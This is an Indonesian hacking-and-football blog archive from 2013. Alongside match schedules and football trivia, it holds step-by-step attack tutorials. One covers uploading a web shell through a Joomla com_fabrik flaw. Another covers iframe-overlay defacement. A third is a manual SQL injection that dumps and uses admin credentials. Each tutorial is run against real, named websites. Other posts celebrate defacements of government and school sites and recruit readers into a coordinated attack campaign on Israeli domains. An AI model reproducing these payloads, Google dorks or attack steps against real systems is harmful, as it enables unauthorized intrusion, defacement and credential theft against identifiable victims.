Jumat, 12 April 2013

Jadwal Semifinal Liga Champions

Posted by Erza Jullian 10.21, under , | No comments

Kemarin UEFA telah melakukan drawing babak semifinal Liga Champions Eropa. Hasilnya, dua klub Spanyol akan berhadapan dengan dua klub Jerman. Bayern Muenchen versus Barcelona dan Borussia Dortmund versus Real Madrid.

Berikut jadwal Semifinal Liga Champions 2013 :



Leg pertama semifinal akan dilangsungkan pada 23 dan 24 April 2013. Sedangkan leg kedua akan dimainkan pada 30 April dan 1 Mei 2013



Semifinal 1: Bayern Muenchen versus Barcelona

Semifinal 2: Borussia Dortmund versus Real Madrid



Sekian info kali ini. Dan tetap Hala Madrid ! . :v



NB : Untuk jam tayang belum ada info. Jika sudah, artikel ini akan segera saya update. Terimakasih.

Rabu, 10 April 2013

[History] Kekalahan Terbesar Dalam Sepak Bola

Posted by Erza Jullian 13.38, under | No comments

Duh, bahas hacking terus-terusan bikin bosen juga. Sampai lupa kalo sebenarnya blog ini juga membahas sepak bola. Dan kali ini saya akan membahas sejarah dalam sepak bola. Tepatnya adalah kekalahan terbesar dalam sejarah sepakbola.

Kekalahan terbesar dalam sepak bola diderita oleh Stade Olympique de L'Emyrne yang dihajar 149-0 oleh AS Adema. Namun kekalahan tersebut terasa tidak wajar karena sebenarnya pemain de L'Emyrne yang memasukkan seluruh gol ke gawangnya sendiri. Loh, kenapa ? Begini kronologinya :

Asosiasi sepak bola Madagaskar memutuskan untuk melarang beberapa pemain SO l'Emyrne dan pelatihnya, setelah mereka memutuskan untuk memprotes keputusan wasit yang membuat mereka kehilangan gelar juara dengan cara menembakkan bola ke gawang mereka sendiri.

Juara bertahan SO l'Emyrne ditahan imbang 2-2 oleh Domoina Soavina Atsimondrano oleh keputusan penalti yang kontroversial di menit akhir dalam turnamen bersistem round-robin untuk menentukan gelar juara liga.

Hasilnya, mereka memilih untuk menggunakan pertandingan terakhir mereka melawan sang juara yang baru, Adema, untuk menjelaskan posisi mereka. Para pemain Adema tidak mencetak gol-gol tersebut. Mereka hanya berdiri terpana, melihat sang lawan mencetak sejarah kekalahan kompetitif terbesar sepanjang sejarah dunia sepak bola.



Benar-benar aneh. Bunuh diri yang spektakuler. Hahaha . YA inilah sepakbola.



Sekian artikel kali ini, semoga bermanfaat.

Senin, 08 April 2013

Inilah Cara Hacker Tolak Ujian Nasional

Posted by Erza Jullian 05.01, under , | No comments

Ya, hacker selalu punya cara tersendiri untuk mengungkapkan sesuatu. Dulu saat kenaikan BBM, ribuan orang turun ke jalanan dan melakukan demo. Hacker hanya tinggal duduk tenang didepan komputer, eksploitasi web, hajar. Tinggalkan pesan dan berharap visitor ataupun webmaster situs yang dideface membaca pesan yang disampaikan.

Dan begitu pula kali ini. Saat pemerintah mencanangkan Ujian Nasional dengan 20 Paket Soal berbeda, Hacker melakukan aksi #OpUAN dengan mendeface situs-situs pendidikan dan menyampaikan pernyataan tidak setuju dengan diadakannya UJIAN NASIONAL. Mereka mengaggap idak adil rasanya jika apa yang kita pelajari selama 12tahun hanya ditentukan selama 4hari.





Berikut Notice yang saya dapat dari salah satu situs sekolahan yang berhasil dideface :



BAPAK PENGEN NINGKATIN MUTU PENDIDIKAN DENGAN UN ? BUKAN BEGITU CARANYA



UN HANYA ADA DI INDONESIA DAN HANYA DI INDONESIA , SETELAH 12 TAHUN DUDUK ,MENCORETI RIBUAN LEMBAR KOSONG ,BAPAK HANYA MELIHAT 4 HARI UNTUK 12 TAHUN , Festival Kami akan terus kami mulai jika peraturan ini makin labil dan membunuh kami ,INGAT PAK SEMUA SISWA PUNYA KEMAMPUAN YG TIDAK SAMA!

>> capil.balikpapan.go.id, bkd.malangkab.go.id, situs-pendidikan.com, lppm.unesa.ac.id, smpn2sutojayan.sch.id, sma2madiun.sch.id, bimbellbba.com and the next is ?? << Beri Kami Keadilan



Seharusnya pemerintah segera menanggapi protes yang disampaikan diatas karena jika tetap dibiarkan, mungkin dalam seminggu kedepan akan lebih banyak situs pendidikan yang bernasib sama dengan situs yang telah disebutkan diatas.



Sekian info kali ini. Terimakasih.

Sabtu, 06 April 2013

Deface Dengan Joomla Component [Com_Fabrik] Remote Shell Upload Vulnerability

Posted by Erza Jullian 12.38, under | No comments

Ini sebenarnya bug lama. Namun ternyata sampai sekarang masih ada saja situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam mencari target dan kepandaian mengolah google dork.

Oke, langsung saja.

Google Dork :

inurl:index.php?option=com_fabrik atau index.php?option=com_fabrik [dork kreasikan sendiri. pemalas nggak bakalan sukses !]

Vulnerable path :

http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1



Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik



Ubah urlnya menjadi : http://www.duo-d-art.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1







Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV



Dan shell kita akan terletak di [site]/media/[shell.php]







Terus,  hajar !!!!




We Are Surabaya BlackHat !

Sekian tutorial kali ini, semoga bermanfaat.

Jumat, 05 April 2013

Bergabunglah Bersama Kami di Operation Israel

Posted by Erza Jullian 10.57, under , | No comments

Besok, 7 April 2013 adalah hari yang ditetapkan Anonymous untuk melakukan serangan besar-besaran secara serempak terhadap situs-situs berdomain co.il [israel]. Ini bukan rencana mendadak karena sebenarnya rencana ini sudah dicanangkan sekitar tiga minggu yang lalu.



Bahkan mungkin sampai saat ini sudah ratusan situs Israel yang berjatuhan.

Intinya, ya inilah yang bisa kami lakukan. Saat para pejuang berjihad membela Palestina di Jalur Gaza, dengan mempertaruhkan harta dan nyawa, kami pun berjuang dengan cara kami sendiri. Berjuang untuk mengirim Israel ke jaman jahiliyah dengan menutup situs-situs penting Israel [terutama situs pemerintahan].

Dan bagaimana dengan Indonesia ? Negara yang sangat kita cintai dan terkenal memiliki banyak situs underground ini tentu akan ikut andil dalam #OpIsrael.

Dan inilah daftar Komunitas Underground Indonesia yang akan mengikuti Operation Israel :



INDONESIA FIGHTER CYBER | CyberSecurity Team | Indonesian Hacking Groups | IDCA | KRA Coder | GARUT BLACKHAT FIGHTER CYBER | Badut-Team | Indonesia Security Down | Ofprogrammer Team | PCC- Team | The Cyber Heroez | S.O.S malware ghost VPN | Anonymous Cyber 04| Gembel Black Cracker's | Cyber Brother | Blackc0de | SULSEL HACKER TEAM | Hkc Team | Keep_siL3nt Ternate Crew | Amikom Cyber Team | Bengkulu Hacker Team | Palembang Hacker Link | Cyber4rt [Hacker Indonesia]  | Manusia Biasa Team [MBT] | Yogyakarta-CyberShadow | Indonesian Hacker Team | Java Defacer Team | 207 Cyber Security| Ravaz`CyberTeam | Surabaya Blackhat | Prabumulih Hacker Team | lampung black heart cyber | Klaten Hacker Team | Sund4nyM0uz Corporation |

Android Cyber Fighter | Bekasi Cyber | SHRI | Greget Hacking Team | Team Sungai Raya Hacker | HN Community | XCode | JOKERHAT HACKERS | Lampung Defacer Team |

Jogja Hacker Team | Bandung Blackhat | Zone-Injector | DEFACE ZONE



Maaf kalo ada yang nggak kesebut. Itu cuma copas dari grup kak. :v



Bagaimana dengan anda ? Ayo bergabung bersama kami !



#OpIsrael Event :

https://www.facebook.com/events/173830282769600/



Official Page :

https://www.facebook.com/ifcanonymouslegion



Official Group :

http://www.facebook.com/groups/israhelloperation/

Rabu, 03 April 2013

Tutorial Deface Dengan JS Overlay

Posted by Erza Jullian 13.45, under | No comments

Kali ini saya akan share teknik deface yang "jarang" digunakan karena ini mungkin menjadi alternatif terakhir jika kita gagal memasang shell pada web target. Ada kalanya sebuah web tidak support file php [kalo ini masih bisa di tamper], atau Web tersebut tidak menyediakan fasilitas upload.



Lalu bagaimana solusinya agar kita bisa men-deface web tersebut ? Dengan JS Overlay. Sistem kerjanya berbeda dengan teknik deface yang didahului dengan mengupload shell. Jika shell diupload, maka biasanya script asli yang diganti. Namun untuk JS Overlay, halaman asli web tersebut "ditimpa" oleh halaman deface yang kita buat. Jadi halaman asli tersebut tetap ada namun ditutup oleh script deface kita. Caranya ?



Sebelumnya kalian membutuhkan script deface yang sudah tertanam di web lain. Jika sebelumnya belum pernah melakukan deface, kalian bisa membuat web/blog sendiri, dideface sendiri hanya sebagai "umpan" dari JS Overlay.



Sebagai contoh, target kita kali ini adalah Lokomedia. Seharusnya bisa upload shell. namun sudah saya coba berkali-kali tidak bisa. Mungkin sudah diantisipasi oleh Webmasternya. Makanya saya coba menggunakan metode JS Overlay.



Oke, kita mulai tutorialnya :

Login ke web target. Buat post baru/kalian bisa mengedit judul/nama dari web tersebut.



Masukkan script ini di bagian judul :

<center><iframe src='[situs yang pernah dideface]' height='820px' width='1100px' scrolling='no' frameborder='0'></center>

Untuk tulisan berwarna merah silahkan diganti dengan url kalian sendiri. Intinya kita memanggil script dari url tersebut untuk menutupi halaman yang akan kita deface.

Untuk contoh, ini script saya :

<center><iframe src='http://personal-jsoverlay.blogspot.com/' height='820px' width='1100px' scrolling='no' frameborder='0'></center>







Lalu klik save.

Done. Kita lihat. :v





Upzzz, you got HACKED !!!!



Teknik ini [sepertinya] bisa digunakan di semua CMS. Entah itu Lokomedia, Joomla, WP, dll.

Kekurangan dari teknik ini adalah kita hanya punya sekali akses ke web korban karena kita tidak bisa menanam backdoor.



Tutorial ini hanya sebagai pembelajaran. Gunakan sebaik-baiknya. Resiko tanggung dewe.



Thanks to : Sandy-x207

Senin, 01 April 2013

Step by Step Manual SQL Injection

Posted by Erza Jullian 14.09, under | No comments

Beberapa waktu lalu saya pernah share tutorial SQLi menggunakan Tool HAVIJ. Ya, mungkin dengan Havij anda sudah bisa mendapatkan username dan password web yang vuln SQLi. Namun mungkin anda tidak akan pernah tahu cara kerjanya karena HAvij bekerja secara otomatis. Kita hanya terima jadi saja.

oleh karena itu kali ini saya akan shere tutorial SQLi secara manual. Saya mendapat tutorial ini dari x'1n73ct.



Alat : Browser Firefox . Kenapa harus firefox ? Karena kita harus menginstall addons HACKBAR yang [sepertinya] hanya ada di Firefox. Hackbar itu seperti apa sih ? Nih screenshotnya ;





Fungsinya ? Simak saja tutorialnya sampai akhir maka anda akan tahu fungsi dari hackbar. Untuk yang belum menginstall hackbar silahkan menuju link berikut :

https://addons.mozilla.org/id/firefox/addon/hackbar/



Oke, kita mulai tutorialnya :



Step 1 :

Cari target vuln SQLi di google. Dork yang bisa digunakan :

inurl:"research.php?cid="

"id=" & intext:"Warning: mysql_fetch_assoc()

"id=" & intext:"Warning: mysql_fetch_array()



Untuk dork lain silahkan cari sendiri atau kreasikan sendiri.

Sebagai web korban untuk tutorial ini saya memilih : http://kkverma.com/content/research.php?cid=2

Kita tambahkan tanda kitip satu ['] di akhri url untuk memastikan apakah webnya vuln SQLi atau tidak.

Sehingga menjadi : http://kkverma.com/content/research.php?cid=2'



Di situ tertulis : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by uid' at line 1 . Error ! Artinya web tersebut vuln SQLi



Step 2 :

Lanjut. Sekarang kita cari tau jumlah table di databasenya dengan perintah �order by� . Cari hingga menemukan error.

http://kkverma.com/content/research.php?cid=2 order by 1-- normal

http://kkverma.com/content/research.php?cid=2 order by 2-- normal

http://kkverma.com/content/research.php?cid=2 order by 3-- normal

http://kkverma.com/content/research.php?cid=2 order by 4-- normal

http://kkverma.com/content/research.php?cid=2 order by 5-- normal

http://kkverma.com/content/research.php?cid=2 order by 6-- ERROR



di "order by 6" kita mendapatkan error dengan tulisan : Unknown column '6' in 'order clause' yang kalo diartikan menjadi "eh, gile lu ye. Mana ada kolom 6" . Sekarang kita sudah tahu kalo jumlah kolom di databasenya ada 5 [karena error di angka 6].



Step 3 :

Sekarang kita mulai mencari "angka ajaib" yang bisa kita injeksi di step sejanjutnya dengan memasukkan perintah union select. Perhatikan saja url yang saya tulis dibawah :

http://kkverma.com/content/research.php?cid=-2 union select 1,2,3,4,5-- [ ingat, setelah ?cid= diberi tanda - ]





Muncul angka ajaib 3 dan 4 .



Step 4 :

Sekarang kita coba untuk melihat versi php dengan angka ajaib tadi. Caranya ialah dengan memasukan perintah � @@version �atau � version() � kedalam salah satu angka yang muncul tadi.

http://kkverma.com/content/research.php?cid=-2 union select 1,2,version(),4,5 -- [karena 3 tadi termasuk angka ajaib]





Tertulis 5.1.61 . Versi php 5 . Berarti tutorial ini masih bisa dilanjutkan. Karena jika menemukan php versi 4 kita harus menebak sendiri isi/tabel dari databasenya.



Step 5 :

Kita akan memunculkan nama-nama table yang ada di dalam database dengan mengganti perintah � @@version � dengan �group_concat(table_name) � dan menambahkan perintah � from information_schema.tables where table_schema=database() � sesudah angka terakhir , sebelum tanda --

http://kkverma.com/content/research.php?cid=-2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--





Kita melihat ada table admin, research, vcounter .



Step 6 :

Sekarang main logika disini. Dimana biasanya akan disimpan data berupa user dan password ? Tentu jawabannya adalah di table admin. Kita coba melihat kolom dari table admin tersebut .

Disinilah hackbar dibutuhkan. Untuk merubah suatu kata menjadi bentuk MySQL CHAR(). Caranya : klik tombol SQL -> MySQL -> MySQL CHAR() . Lalu kita convert kata "admin" menjadi bentuk MySQL CHAR() .





Dan hasil convert dari kata admin adalah CHAR(97, 100, 109, 105, 110)



Step 7 :

Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Cara mengganti perintah � group_concat(table_name) � dengan perintah � group_concat(column_name) � dan mengganti perintah � information_schema.tables � menjadi � information_schema.columns � juga mengganti perintah � table_schema=database() � dengan perintah � table_name=[hasil convert MySQL CHAR() - Step 6] �



http://kkverma.com/content/research.php?cid=-2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--





Kita mendapat kolom aid, admin id, admin pass di tabel admin.



Step 8 :

Sekarang kita coba membuka data yang ada di kolom aid, admin id , dan admin pass .

Caranya ialah mengganti perintah group_concat(table_name) menjadi group_concat(aid,0x3a,admin_id,0x3a,admin_pass) dan mengganti perintah � from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)�� dengan perintah �from admin�� . disitu kita melihat ada tanda 0x3a. Apa maksudnya ? 0x3a adalah bentuk HEX dari tanda : sehingga data nanti akan dipisah dengan tanda : .

http://kkverma.com/content/research.php?cid=-2 union select 1,2,group_concat(aid,0x3a,admin_id,0x3a,admin_pass),4,5 from admin--





Kita mendapatkan data berikut ;

aid : 1

Admin ID : admin

Admin Pass : bimogay --- adminnya bernama Bimo, orangnya Gay. Hihihi



Step 9 :

Sekarang kita coba mencari halaman loginnya. Tidak bakal jauh dari kata "admin" ataupun "login" . Kalo malas mencari manual, cari dengan software Admin Finder. Cari sendiri di Google.

Kita menemukan halaman loginnya terletak di :

http://kkverma.com/admin





Masukkan user dan password sesuai dengan data yang telah kita dapat.

Dan.......





Uh, indahnya dunia ini. :v

Masuk halaman admin bray. Namun ternyata tidak bisa upload shell. Kita deface saja dengan metode JS Overlay.





Sekian tutorial kali ini, semoga bermanfaat.



Greetz : x'1n73ct

Content created by Yuyud HNc a.k.a Nabilaholic404 a.k.a admin paling ganteng di Madura Cyber [karena gue admin tunggal disini]

Copas tanpa Link Sumber = JANCOK


[+] JKT48 CYBER TEAM [+]

Blog Archive

Blog Archive